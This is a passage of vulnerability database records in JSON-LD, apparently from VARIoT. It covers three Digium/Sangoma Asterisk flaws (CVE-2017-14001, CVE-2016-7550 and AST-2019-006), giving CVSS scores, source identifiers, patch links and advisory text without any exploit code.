"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2017-14001",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2017-27939",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "a65c0f37-5815-4893-b0c3-0c14c3b1b227",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.9 [IVD]"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-14001",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14001",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-27939",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-1088",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "IVD",
"id": "a65c0f37-5815-4893-b0c3-0c14c3b1b227",
"trust": 0.2,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "a65c0f37-5815-4893-b0c3-0c14c3b1b227"
},
{
"db": "CNVD",
"id": "CNVD-2017-27939"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008554"
},
{
"db": "NVD",
"id": "CVE-2017-14001"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1088"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An Improper Neutralization of Special Elements used in an OS Command issue was discovered in Digium Asterisk GUI 2.1.0 and prior. An OS command injection vulnerability has been identified that may allow the execution of arbitrary code on the system through the inclusion of OS commands in the URL request of the program. The Asterisk GUI is a framework for configuring graphical user interfaces. Digium Asterisk GUI is prone to an OS command-injection vulnerability because it fails to properly sanitize user-supplied input. \nSuccessfully exploiting this issue may allow an attacker to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. \nAsterisk GUI 2.1.0 and prior versions are vulnerable",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14001"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008554"
},
{
"db": "CNVD",
"id": "CNVD-2017-27939"
},
{
"db": "BID",
"id": "100950"
},
{
"db": "IVD",
"id": "a65c0f37-5815-4893-b0c3-0c14c3b1b227"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14001",
"trust": 3.5
},
{
"db": "ICS CERT",
"id": "ICSA-17-264-03",
"trust": 3.3
},
{
"db": "BID",
"id": "100950",
"trust": 1.9
},
{
"db": "CNVD",
"id": "CNVD-2017-27939",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1088",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008554",
"trust": 0.8
},
{
"db": "IVD",
"id": "A65C0F37-5815-4893-B0C3-0C14C3B1B227",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "a65c0f37-5815-4893-b0c3-0c14c3b1b227"
},
{
"db": "CNVD",
"id": "CNVD-2017-27939"
},
{
"db": "BID",
"id": "100950"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008554"
},
{
"db": "NVD",
"id": "CVE-2017-14001"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1088"
}
]
},
"id": "VAR-201709-0712",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "a65c0f37-5815-4893-b0c3-0c14c3b1b227"
},
{
"db": "CNVD",
"id": "CNVD-2017-27939"
}
],
"trust": 1.4
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "a65c0f37-5815-4893-b0c3-0c14c3b1b227"
},
{
"db": "CNVD",
"id": "CNVD-2017-27939"
}
]
},
"last_update_date": "2023-12-18T13:24:19.834000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.digium.com/"
},
{
"title": "Patch for Digium Asterisk GUI OS Command Injection Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/102623"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-27939"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008554"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008554"
},
{
"db": "NVD",
"id": "CVE-2017-14001"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.3,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-17-264-03"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/100950"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14001"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14001"
},
{
"trust": 0.3,
"url": "https://www.digium.com/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-27939"
},
{
"db": "BID",
"id": "100950"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008554"
},
{
"db": "NVD",
"id": "CVE-2017-14001"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1088"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "a65c0f37-5815-4893-b0c3-0c14c3b1b227"
},
{
"db": "CNVD",
"id": "CNVD-2017-27939"
},
{
"db": "BID",
"id": "100950"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008554"
},
{
"db": "NVD",
"id": "CVE-2017-14001"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-1088"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-22T00:00:00",
"db": "IVD",
"id": "a65c0f37-5815-4893-b0c3-0c14c3b1b227"
},
{
"date": "2017-09-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-27939"
},
{
"date": "2017-09-21T00:00:00",
"db": "BID",
"id": "100950"
},
{
"date": "2017-10-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008554"
},
{
"date": "2017-09-26T02:29:00.187000",
"db": "NVD",
"id": "CVE-2017-14001"
},
{
"date": "2017-09-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-1088"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-27939"
},
{
"date": "2017-09-21T00:00:00",
"db": "BID",
"id": "100950"
},
{
"date": "2017-10-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008554"
},
{
"date": "2019-10-09T23:23:42.310000",
"db": "NVD",
"id": "CVE-2017-14001"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-1088"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-1088"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Digium Asterisk GUI OS Command injection vulnerability",
"sources": [
{
"db": "IVD",
"id": "a65c0f37-5815-4893-b0c3-0c14c3b1b227"
},
{
"db": "CNVD",
"id": "CNVD-2017-27939"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-1088"
}
],
"trust": 0.6
}
}
VAR-201905-0637
Vulnerability from variot - Updated: 2023-12-18 13:02asterisk 13.10.0 is affected by: denial of service issues in asterisk. The impact is: cause a denial of service (remote). asterisk Is NULL A vulnerability related to pointer dereference exists.Service operation interruption (DoS) There is a possibility of being put into a state. DigiumAsterisk is a set of open source telephone exchange (PBX) system software from Digium, USA. The software supports voicemail, multi-party voice conferencing, interactive voice response (IVR) and more. A security vulnerability exists in DigiumAsterisk version 13.10.0
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201905-0637",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "asterisk",
"scope": "eq",
"trust": 2.4,
"vendor": "digium",
"version": "13.10.0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "NVD",
"id": "CVE-2016-7550"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:digium:asterisk:13.10.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-7550"
}
]
},
"cve": "CVE-2016-7550",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2016-7550",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-16531",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2016-7550",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-7550",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2019-16531",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201905-972",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "NVD",
"id": "CVE-2016-7550"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-972"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "asterisk 13.10.0 is affected by: denial of service issues in asterisk. The impact is: cause a denial of service (remote). asterisk Is NULL A vulnerability related to pointer dereference exists.Service operation interruption (DoS) There is a possibility of being put into a state. DigiumAsterisk is a set of open source telephone exchange (PBX) system software from Digium, USA. The software supports voicemail, multi-party voice conferencing, interactive voice response (IVR) and more. A security vulnerability exists in DigiumAsterisk version 13.10.0",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-7550"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "CNVD",
"id": "CNVD-2019-16531"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-7550",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-16531",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201905-972",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "NVD",
"id": "CVE-2016-7550"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-972"
}
]
},
"id": "VAR-201905-0637",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
}
]
},
"last_update_date": "2023-12-18T13:02:13.874000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AST-2016-006",
"trust": 0.8,
"url": "http://downloads.asterisk.org/pub/security/ast-2016-006.html"
},
{
"title": "Patch for DigiumAsterisk Denial of Service Vulnerability (CNVD-2019-16531)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/163053"
},
{
"title": "Digium Asterisk Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=92924"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-972"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-476",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "NVD",
"id": "CVE-2016-7550"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2016-006.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-7550"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-7550"
},
{
"trust": 0.6,
"url": "https://web.nvd.nist.gov//vuln/detail/cve-2016-7550"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "NVD",
"id": "CVE-2016-7550"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-972"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "NVD",
"id": "CVE-2016-7550"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-972"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"date": "2019-06-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"date": "2019-05-23T19:29:00.243000",
"db": "NVD",
"id": "CVE-2016-7550"
},
{
"date": "2019-05-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-972"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"date": "2019-06-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"date": "2019-05-24T17:12:45.697000",
"db": "NVD",
"id": "CVE-2016-7550"
},
{
"date": "2019-05-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-972"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-972"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "asterisk In NULL Pointer dereference vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-972"
}
],
"trust": 0.6
}
}
VAR-201911-0701
Vulnerability from variot - Updated: 2023-12-18 12:27An issue was discovered in channels/chan_sip.c in Sangoma Asterisk 13.x before 13.29.2, 16.x before 16.6.2, and 17.x before 17.0.1, and Certified Asterisk 13.21 before cert5. A SIP request can be sent to Asterisk that can change a SIP peer's IP address. A REGISTER does not need to occur, and calls can be hijacked as a result. The only thing that needs to be known is the peer's name; authentication details such as passwords do not need to be known. This vulnerability is only exploitable when the nat option is set to the default, or auto_force_rport. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voice mail, multi-party voice conferencing, interactive voice response (IVR), and more. An attacker could use this vulnerability to cause a denial of service.
Nature of Advisory Denial of Service
Susceptibility Remote Unauthenticated Sessions
Severity Minor
Exploits Known No
Reported On October 17, 2019
Reported By Andrey V. T.
Modules Affected channels/chan_sip.c
Resolution Using any other option value for “nat” will prevent the
attack (such as “nat=no” or “nat=force_rport”), but will
need to be tested on an individual basis to ensure that it
works for the user’s deployment. On the fixed versions of
Asterisk, it will no longer set the address of the peer
before authentication is successful when a SIP request comes
in.
Affected Versions
Product Release
Series
Asterisk Open Source 13.x All releases
Asterisk Open Source 16.x All releases
Asterisk Open Source 17.x All releases
Certified Asterisk 13.21 All releases
Corrected In
Product Release
Asterisk Open Source 13.29.2
Asterisk Open Source 16.6.2
Asterisk Open Source 17.0.1
Certified Asterisk 13.21-cert5
Patches
SVN URL Revision
http://downloads.asterisk.org/pub/security/AST-2019-006-13.diff Asterisk 13
http://downloads.asterisk.org/pub/security/AST-2019-006-16.diff Asterisk 16
http://downloads.asterisk.org/pub/security/AST-2019-006-17.diff Asterisk 17
http://downloads.asterisk.org/pub/security/AST-2019-006-13.21.diff Certified
Asterisk
13.21-cert5
Links https://issues.asterisk.org/jira/browse/ASTERISK-28589
Asterisk Project Security Advisories are posted at
http://www.asterisk.org/security
This document may be superseded by later versions; if so, the latest
version will be posted at
http://downloads.digium.com/pub/security/AST-2019-006.pdf and
http://downloads.digium.com/pub/security/AST-2019-006.html
Revision History
Date Editor Revisions Made
October 22, 2019 Ben Ford Initial Revision
November 14, 2019 Ben Ford Corrected and updated fields for
versioning, and added CVE
November 21, 2019 Ben Ford Added “Posted On” date
Asterisk Project Security Advisory - AST-2019-006
Copyright © 2019 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its original, unaltered form
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
